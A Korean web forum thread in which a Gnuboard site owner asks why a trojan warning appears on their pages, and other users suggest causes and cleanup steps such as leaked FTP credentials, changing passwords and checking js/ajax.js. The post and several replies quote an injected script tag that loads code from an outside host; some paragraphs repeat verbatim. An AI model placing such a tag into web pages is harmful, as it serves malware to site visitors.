그누보드 head.sub.php 에 악성코드가... 정보
그누보드 head.sub.php 에 악성코드가...본문
웹사이트 상에서 트로이목마 바이러스가 검출되어 해당 페이지 소스를 열어보니..
아래와 같이 <script src=http://kellerkamer.de/images/impressum.php ></script>
소스가 들어 있더라고요.
그래서
그누보드 head.sub.php 에 악성코드가... 있는것 같아 열어보니...
그 페이지에는 해당 코드가 없는데...
어떻게 된건가요?.. ㅡㅡ;
악성코드 때문에 돌아가실 지경입니다. 해결하신 분들의 도움 바래요.
글 검색해 보니... 사이트 경로만 틀리지 질문 올리신 분들은 꽤 되시던데... 해결방법이 없네요.
도와주세요
아래와 같이 <script src=http://kellerkamer.de/images/impressum.php ></script>
소스가 들어 있더라고요.
그래서
그누보드 head.sub.php 에 악성코드가... 있는것 같아 열어보니...
그 페이지에는 해당 코드가 없는데...
어떻게 된건가요?.. ㅡㅡ;
악성코드 때문에 돌아가실 지경입니다. 해결하신 분들의 도움 바래요.
글 검색해 보니... 사이트 경로만 틀리지 질문 올리신 분들은 꽤 되시던데... 해결방법이 없네요.
도와주세요
댓글 전체
일단 클릭 전쟁님 사용하시는 컴퓨터 바이러스검사부터 하시길 바랍니다.
클릭 전쟁님 컴퓨터에 바이러스가 걸려서 그런 것입니다. ^^;;
클릭 전쟁님 컴퓨터에 바이러스가 걸려서 그런 것입니다. ^^;;
여러경우가 있는데 간혹 서버의 네트워크 단에서 이루어 지는 경우도 있습니다.
다른 서버가 질문자님의 서버의 패킷을 읽어서 적절한 위치에 스크립트를 추가해서 재전송하는거죠.
임시방편으로 (되려나)
</script><!--
--><body topmargin ..
주석처리해보심이;;
다른 서버가 질문자님의 서버의 패킷을 읽어서 적절한 위치에 스크립트를 추가해서 재전송하는거죠.
임시방편으로 (되려나)
</script><!--
--><body topmargin ..
주석처리해보심이;;
ftp 정보가 누설되어 있는 경우 일수도 있습니다.
님이 모르시는 <script> 파일들을 모두 찾아서 지우시고...
ftp 정보 변경을 해보시는게 좋을거 같습니다.
저같은 경우는 지워도 지워도 계속 생겨 나드라구요.. 즉 ftp 정보가 노출 됐다는거죠~~
그러니깐 제가 알려 주시는 데로 해보세요~~
님이 모르시는 <script> 파일들을 모두 찾아서 지우시고...
ftp 정보 변경을 해보시는게 좋을거 같습니다.
저같은 경우는 지워도 지워도 계속 생겨 나드라구요.. 즉 ftp 정보가 노출 됐다는거죠~~
그러니깐 제가 알려 주시는 데로 해보세요~~
서버의 악성코드 점검이 먼저 필요합니다. 만약 서버가 깨끗하다면 님의 FTP 계정정보가 유출되었습니다. 비번 변경후 ftp 접속시 sftp를 사용하세요.
일단 현재 사용중인 컴퓨터를 바이러스 검사를 하셔서 악성코드 및 바이러스를 제거 하신 다음, 위 계정에 변조된 파일을 복구하세요. (index.php 파일이란 파일은 모두 확인하세요.) 하신 다음 ftp 및 db등의 비밀번호를 변경하시길 바랍니다.
js/ajax.js에 보시면
<script src=http://kellerkamer.de/images/impressum.php ></script>
가 있을겁니다. 지우세요.
저도 당해봤습니다 하하하
<script src=http://kellerkamer.de/images/impressum.php ></script>
가 있을겁니다. 지우세요.
저도 당해봤습니다 하하하
감사합니다. 알려주신데로 우선 처리해 봐야겠습니다. ㅡㅡ;
